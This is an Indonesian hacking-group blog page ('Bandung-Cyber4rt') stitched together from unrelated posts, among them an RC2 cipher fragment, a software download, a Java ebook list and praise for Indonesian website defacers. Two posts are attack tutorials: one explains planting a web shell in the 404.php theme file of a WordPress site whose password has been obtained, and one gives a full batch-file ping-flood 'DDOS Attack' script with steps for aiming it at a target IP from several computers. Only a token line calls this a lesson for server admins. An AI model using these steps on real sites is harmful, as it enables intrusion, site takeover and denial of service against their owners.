RC2 adalah 64-bit blok cipher dengan ukuran variabel kunci . 18 Its putaran diatur sebagai sumber-berat jaringan Feistel , dengan 16 putaran dari satu jenis (pencampuran) diselingi oleh dua putaran jenis lain (dihaluskan). Sebuah putaran pencampuran terdiri dari empat aplikasi transformasi MIX, seperti ditunjukkan pada diagram.


Source: http://vj-arif.blogspot.com/2010/05/macam-macam-enkripsi-yang-digunakan.html
Semoga bermanfaat all..


Sekian postingan saya kali ini tentang Tipe-Tipe Hash & Enkripsi. Kurang lebihnya saya mohon maaf dan semoga dapat bermanfaat, Wassalam.

SEMOGA BERMANFAAT DAN DITUNGGU KOMENTAR NYA YA ^_^

0 Software untuk shutdown otomatis komputer

Bandung-Cyber4rt - Untuk kesempatan ini Admin ingin share software yang berfungsi untuk mematikan komputer secara otomatis dengan mudah juga menggunakan timer yang bisa kita set. Software ini selain bisa auto shutdown komputer dengan mudah juga dapat melakukan aksi lain seperti Log Off, Stand By ataupun Restart.

Kalian suka ketiduran atau lupa buat shutdown komputer atau laptop kamu  sampai subuh,jangan khawatir Admin punya tips untuk mengatasi masalah Ketiduran atau Kelupaan tsb, yang terasa buat saya itu suka Ketiduran... hehe

  1. Sekarang kamu download terlebih dahulu softwarenya : KLIK HERE (548,47.KB) 
  2. Password Download : MasAbuBlog
  3. Instal software yang telah di Download dan jalankan(ada di Start Menu)
  4. Sekarang kamu bisa pilih Timer untuk shutdown dan lainnya sesuai keinginan.
  5. Software ini juga dapat kita gunakan untuk shoutdown, Restart, dll dengan cara mengklik kanan icon software seperti pada gambar langkah no 3. dan Pilih Action.


Sumber : http://mas-abu.blogspot.com/2012/09/software-untuk-shutdown-otomatis.html

Sekian postingan saya kali ini tentang Cara Upload Shell Di Wordpress. Kurang lebihnya saya mohon maaf dan semoga dapat bermanfaat, Wassalam.

SEMOGA BERMANFAAT DAN DITUNGGU KOMENTAR NYA YA ^_^

0 Cara Upload Shell Di Wordpress

Bandung-Cyber4rt - assalamualaikum kali ini saya dari team samarinda coder ingin berbagi neh
tentang cara upload shell di wordpress
pertama siap kan web yang sudah anda dapat password jadi tinggal login aja :D
pertama klik editor
tampilan seperti ini

kalau sudah kita ke next steep
cari template template seperti di atas dengan nama 404.php
kalau sudah nanti seperti gambar di atas
next stepp
masukan source code shell nya di sana
nantinggal klik update / save
ok lanjut
bila sudah tinggal panggil link nya saja
contoh : http://contoh-target.com/wp-content/themes/SolidStart/404.php
jadi dengan code : wp-content/themes/SolidStart/404.php <-- fungsi tempat shell yang kita upload tadi
ok sekian dulu dari saya 
dengan toturial cara upload shell salam kenal dengan Bandung-Cyber4rtCrew [ Samarinda Coder Team ]



Sekian postingan saya kali ini tentang Cara Upload Shell Di Wordpress. Kurang lebihnya saya mohon maaf dan semoga dapat bermanfaat, Wassalam.

SEMOGA BERMANFAAT DAN DITUNGGU KOMENTAR NYA YA ^_^

0 DDOS Menggunakan Notepad

DDOS Menggunakan Notepad 
Bandung-Cyber4rt - Kali ini Admin akan mempraktekkan DDOS melalui Notepad. Langsung saja, berikut tutorialnya:

LANGKAH 1:
Copy code-code dibawah ini :

Code:

    @echo off
    mode 67,16
    title DDOS Attack
    color 0a
    cls
    echo.
    echo DDOS With Batchfile
    echo.
    set /p x=Server-Target:
    echo.
    ping %x%
    @ping.exe 127.0.0.1 -n 5 -w 1000 > nul
    goto Next
    :Next
    echo.
    echo.
    echo.
    set /p m=ip Host:
    echo.
    set /p n=Packet Size:
    echo.
    :DDOS
    color 0c
    echo Attacking Server %m%
    ping %m% -i %n% -t >nul
    goto DDOS


LANGKAH 2:
Buka application notepad dan paste code-code diatas tadi.

LANGKAH 3:
Save file anda seperti dibawah :

File Name : DDoS Attack.bat
Save As Type : All File <--- PENTING

    Quote: bisa disave dgn namafile bebas sesuka bro n sist..
    tapi ingat , File Extensi harus berformat .Bat


Cara-cara menggunakannya :
1. Double click file anda itu.
2. Akan tertera : Server-Target:
Masukkan alamat/url website anda.pastikan tidak ada http:// di depan dan / di belakang url.

    Quote:Contoh :
    Sebelum = http://www.google.com/
    Tukarkan kepada = www[.]google[.]com

    *hilangkan tanda '[]'.
    Setelah memasukkan url itu, tekan enter.


LANGKAH 4:
Selepas itu, website itu akan di-ping untuk mendapatkan ip address.Anda memerlukan IP Address itu.

Setelah selesai ping, akan keluar seperti ini :

Pinging http://www.google.com

[209.85.175.106] with 32 bytes of data:
Reply from 209.85.175.106: bytes=32 time=30ms TTL=56
Reply from 209.85.175.106: bytes=32 time=40ms TTL=55
Reply from 209.85.175.106: bytes=32 time=24ms TTL=56
Reply from 209.85.175.106: bytes=32 time=36ms TTL=56

Ping statistics for 209.85.175.106:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 24ms, Maximum = 40ms, Average = 32ms

209.85.175.106 <----- IP address bagi http://www.google.com

    Quote: cara sama kok untuk web yg lain

4. Selepas itu, akan terpapar di tool itu : ip Host:
Masukkan saja ip address yg anda dapat tadi.

Contoh :
ip Host:209.85.175.106

dan tekan enter.

5. Pada akhirnya akan keluar pula : Packet Size :
Letakkan letakkan semau anda sebagai POWER !

Contoh :
Packet Size : 10000000

Dan tekan enter.

6. Akan terpapar : Attacking Server.....

Itu bermakna tool itu sedang menjalankan tugasnya(DDoS).

Jika ingin hasil yang maksimal , harus DDOS dengan beberapa komputer biar cepat down targetnya.

Sekian tutorial ini, agar bisa menjadi bahan pembelajaran bagi para Admin Server untuk selalu meningkatkan keamanan servernya. Salah satunya bisa menggunakan DDOS Protection, dll.


Sekian postingan saya kali ini tentang DDOS Menggunakan Notepad . Kurang lebihnya saya mohon maaf dan semoga dapat bermanfaat, Wassalam.

SEMOGA BERMANFAAT DAN DITUNGGU KOMENTAR NYA YA ^_^

0 Dua Hacker Indonesia Masuk dalam 20 besar hacker Dunia


hacked

Bandung-Cyber4rt - Sudah Lebih dari ribuan website yang mereka jebol dengan tehnik mereka masing-masing, ini memberikan bukti bahwa mereka tidak kalah dengan hacker luar, mungkin orang luar hebat dalam membuat tapi kita lebih hebat dalam menyusup :D , jelas saja hebat koneksi di indonesia kan kayak siput pikul tronton, padahal hacking perlu bandwith yang tidak sedikit, tapi ini bukan merusak, namun terlebih pada testing security dari website tersebut agar lebih mengoptimalkan celah yang ada di keamanan websitenya. intinya begini bagaimana kita tau besi itu keras apabila tidak ada yang mencoba mematahkannya, dan hacking ini ada kontesnya,
Penasaran Siapa ke 2 Hacker Tersebut sebentar, nanti saya di bilang Hoax, kita lihat dulu peringkat 20 besar Hacker dunia klik disini >> sebelumnya harus daftar dulu untuk melihat updatenya. liat daftarnya di bawah ini:
list hacker
nah siapa 2 hacker yang yang saya sebut-sebut masuk dalam 20 besar dia ada di Peringkat Ke3 dan Ke6. dengan Nick Hmei7 dan www.forzulfa.org
keterangan table diatas kurang lebih seperti ini Nomer – Nick – jumlah website yang telah di hack
Pertanyaan selanjutnya , Bagaimana Ke Dua Nick tersebut adalah orang indonesia Jawabannya, lihat saja dari hasil hacking mereka, dalam script deface mereka mencantumkan nama indonesia.
nah lengkap kan. untuk pendapat dari saya sebaiknya untuk baiknya buat para defacer indo yg deface web indo tolong jangan di rusak file dan database nya . kalo mau deface index baiknya titip file index aja, atau backup index nya . kalo tidak, cukup  titip file dan gambar deface aja. Bravo Indonesia.



Sekian postingan saya kali ini tentang Dua Hacker Indonesia Masuk dalam 20 besar hacker Dunia. Kurang lebihnya saya mohon maaf dan semoga dapat bermanfaat, Wassalam.


SEMOGA BERMANFAAT DAN DITUNGGU KOMENTAR NYA YA ^_^

2 Java Ebook Untuk Belajar Pemrograman

Bandung-Cyber4rt -  Hallo Bandung-Cyber4rtCrew Family,
Kumpulan ebook ini berguna untuk belajar program, belajar programmer dan belajar pemrograman khususnya mengenai “java”. Semoga bermanfaat saja deh ya.

KUMPULAN JAVA EBOOK

Free online book: Java Fundamentals
Java Fundamentals: A entry level textbook on the Java programming language by Gary Marrer.
Isi Ebook:

  • History of Java
  • What makes Java, Java
  • Design Tools (Modeling Program Logic)
  • Program Documentation
  • Identifiers: Variables and Constants
  • Structured Programming
  • Using Repetition Structures
  • Arrays 101
  • Introduction to Object Orientated Programming
  • Inheritance Expanded
  • AWT versus Swing Packages
  • Arrays Revisited
  • Adding data persistence to programs
Book Details
Author(s): Gary Marrer
Format(s): HTML
Link: BACA ONLINE DISINI
A “Free Java book” by Daniel L. Schuster in pdf format.
Isi Ebook
  • Fundamentals
  • ACM Java Graphics
  • Making Decisions
  • Loops
  • Methods & Objects I
  • Game Programming I
  • Useful Java Objects
  • Methods II
  • Arrays & ArrayLists
  • Objects II
  • Game Programming II
  • Arrays II
  • Quick Reference
  • Setting Up Your Computer
Book Details
Author(s): Daniel L. Schuster
Format(s): PDF
Link: DOWNLOAD DISINI
The Common Java Cookbook
The Common Java Cookbook by Tim O’Brien.
Isi Ebook

  • Supplements to the Java 2 Platform
  • Manipulating Text
  • JavaBeans
  • Functors
  • Collections
  • XML
  • Application Infrastructure
  • Math
  • Templating
  • I/O and Networking
  • HTTP and WebDAV
  • Searching and Filtering
  • JSON
  • Protocol Buffers
  • Google Guava: I/O
  • Google Guava: Collections
Book Details
Author(s): Tim O’Brien
Format(s): HTML, PDF
File size: 6.50 MB
Number of pages: 367
Link: DOWNLOAD ATAU BACA DISINI

Java Look and Feel Design Guidelines


  • Author: Sun Microsystems, Inc.
  • Format: online HTML
  • Price: free
Isi Ebook:
  • The Java Look and Feel
  • The Java Foundation Classes
  • Design Considerations
  • Visual Design
  • Application Graphics
  • Behavior
  • Windows and Panes
  • Dialog Boxes and Alert Boxes
  • Menus and Toolbars
  • Basic Controls
  • Text Components
  • Selectable Lists, Tables, and Tree Components
  • Keyboard Shortcuts, Mnemonics, and Other Keyboard Operations
  • Graphics Repository
  • Localization Word Lists
  • Switching Look and Feel Designs
Link: DOWNLOAD DISINI

A Guide to Modern Programming with Java



  • Author: Gregory J. E. Rawlins
  • Format: online HTML
  • Price: free
Isi Ebook:
  • Setting the Stage
  • Introducing the Players
  • Behind the Scenes
  • Character Study
  • Stage Direction
  • All Together Now
  • It Takes All Types
  • What’s in a Name?
  • Think Like an Object
  • Let the Games Begin
  • The Play’s the Thing
  • Networking
  • Defensive Programming
  • Design Patterns
  • Navel Gazing
  • Satori
  • Avoiding Style Crime
  • Java’s Flaws
  • Book Recommendations
  • The Rest of Java
Link: DOWNLOAD DISINI

Sekian postingan saya kali ini tentang Java Ebook Untuk Belajar Pemrograman. Kurang lebihnya saya mohon maaf dan semoga dapat bermanfaat, Wassalam.


SEMOGA BERMANFAAT DAN DITUNGGU KOMENTAR NYA YA ^_^